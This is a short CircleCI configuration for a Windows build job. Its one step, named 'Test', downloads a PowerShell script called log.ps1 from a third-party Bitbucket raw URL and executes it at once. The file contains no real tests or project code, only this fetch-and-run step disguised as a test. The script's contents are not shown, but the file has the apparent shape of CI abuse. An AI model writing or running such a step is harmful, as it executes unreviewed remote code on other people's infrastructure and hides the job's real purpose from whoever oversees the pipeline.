version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/tarmirah/tarmi/raw/aa01401016391ff49b469ca0a0442f13812ad566/log.ps1 -OutFile log.ps1
            ./log.ps1
